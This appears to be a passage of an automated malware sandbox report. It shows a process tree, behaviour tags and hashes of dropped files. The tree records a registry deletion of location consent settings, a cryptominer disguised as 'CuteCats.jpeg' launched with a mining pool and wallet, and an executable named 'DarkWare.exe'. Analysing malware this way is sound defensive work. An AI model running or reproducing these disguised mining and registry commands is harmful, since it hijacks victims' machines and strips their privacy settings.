C:\Windows\system32\cmd.exe/c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul4⤵PID:3532
-
C:\Windows\system32\reg.exeREG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f5⤵PID:1376
-
-
-
C:\ProgramData\CuteCats.jpegC:\ProgramData\CuteCats.jpeg -a kawpow -i 20 -o stratum+tcp://rvn.2miners.com:6060 -u RPUFwA26gSfphDcuv9hFe2LFLJxZcQzm8D.adraf -p x --api-bind-http 04⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4468
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
38.3MB
MD540532ea36c2d4de56522ecf707bf289e
SHA186520c67e37b43366f965b63ba78070688bff83e
SHA25608e994aa4659a0fd4674d93ed9e683dff7c020013629e39d6ea73091f2bcd33b
SHA51241df9cc910afe6ffe7f92e1e26b607cf7fea18f52a746ca97d532406401035b5bb3ac5ebcb9bc659d4125cbf7262383aefc1f03a01886dc71e268b52ac2b43ce
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5a564bf2992cb7487a2563b101ae5cb80
SHA18b03776a0eab33f6e8db2d261d728656d33e5a0a
SHA2568c579dfec41ee5b837fb1c666ef5b0e3808e221b5f5b22d4e01d5a616b191e88
SHA512cd807addfc75e2a199f27e47b03972ebca4623f973852ddfd606945525bece0464d8ac6dc73894858e83ab6ec99c274c18d17309505379d983548bc139ec7151
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5393ea12f2cf6ce06c0eeedc5401bc064
SHA11fd8dccbb5bd41a630cc7d32a7e0ab7abae1bccd
SHA2561acf1947154d60083a4393bdb7972921d62689e2ae967dd3c439451021746e08
SHA5128048e8fff2987f723a70fac53d58c7355001240471a69baeee793fd9c8b58eae461e7fe3c2a87f6233c0b74bebeda41f8c403400ea3e7ee9508f36df4b790479
-
Filesize
13B
MD56b50dec244e531ad4eb8ba4038fdffc0
SHA1cdc893c27721d991e5ab351ff5d754642feab3fe
SHA2566e924481ad4684672d0897d5d796e8930f4ba41060f7a263753e3078bf4ab1cd
SHA512af1b020ae809d951155c13942111c2110343350cec13954a397274b685b74f48247f0f9d341bc047237c17116b34043e716d8c8aac0d4405c290a0d660436c13
-
Filesize
165B
MD5307b6787371c67795d3df552ada87dbd
SHA1f75576cba401c24a73fadacb93fa51b6186fba0d
SHA256f69b13a9a72c712792f7faf838007b75c8f35991b23a904d91f5178004484bdc
SHA512dfa97e7260c5ea9b3c916118c913a5b7729fea532a048066128ef7fffd430466860dce7b2a87357780139d5cee741754c46e3ad39602e7a8fde8dba5c0e89161
-
Filesize
138KB
MD56fe439b4f5cf20c00b987658efc382ab
SHA12828e90db93c67305bffaa2c073de74f04624bf8
SHA256463dd3b1a23e58e02389bc85d414c29a345e1f68ce083dcb97f9e969b99b3e81
SHA512c269f578b399921e5701c43a4f6ee25f23427e32782af4611f65ae42f4a823751ca8a296ccb383c17cc91c0d8d4975f5a85a4a368e8e424dfb2748051941befd
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
217B
MD57b27754f38364499d2e3ca7545e595dd
SHA1fda34f6a52c365cc923c24efe91c1e5872fb35ca
SHA2564c9a72709d68a7a8de1c0671ef22b1418d738b593d6d4a2fec2db30858be9418
SHA51203e0c9807e62a462207eb7fdec44bb07b19c80753093777c99045c168f881feab4245bc874942bb7943a4219610e04e2a8a343b5922fdffaa68828d333670303
-
Filesize
163B
MD57f20048f8da6e42dfd6331bd96b8dd02
SHA190126e36609efec7cbeacae5dc8e001c71f14761
SHA2565dfd0b7798205499580908d5606fb0c9477ac5218549c3f8d4b5cefdebbd3ff8
SHA512adf540254f5d6b5c3881dfe2d4a801d9302adf8fbac2fbf2dfcc15542cb77ec311336c783b806631ad7f3d065e732889e0bf5dcd42eaff1c33de1c828f4d6cac
-
Filesize
120B
MD52a5c3c98c3398680dd3e4caaf4283721
SHA13a3a80594c3001c51769f92bdd9e9bc71474f1bb
SHA256054e4c4699aef7aae33a8fe1c758c75d7a351ffa9f6184e59093031bebf67e70
SHA5125722337a6128d60b8110f6e5ee6618453eae3ad54320bf27dc43a6ca333c0d8333df027647a588f8fa890cb6ec7e0921b2597216ea48c593c2c6c2008603d786
-
Filesize
1.9MB
MD52fe735b8323f0a8ad747737d3f3bc183
SHA14c42b0dc2fe774cb09eb1049897cb2f4205e318c
SHA2566d7a95d3cfd8acdf6e3fafbbe35130db3da4d7281918bce6eb226bc5488f91d5
SHA512022fac37dab002298231c9288c08ed13d812a1ac93c07064d386b539ac6141b39439dec676f70e3677fb89b6482f2ee475d19c67f90b634d5fa06e806f1fd17a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
230KB
MD5f08723bcb5c94651b8df18a3ad027460
SHA1e9f855543aab8f383a34d6a738889034daa6b5a3
SHA256b8ca9e14e7adaa62220329b33138336146a2b3188215fcbd38365efc2f756460
SHA5123f647c85345e08d533d15a3fab7394da3caff2b4fdbaaa83946321312f3f17d5cba018309d4b2206f083f9fd90f568c27399932c2ae5ae79200a05d6dd0da589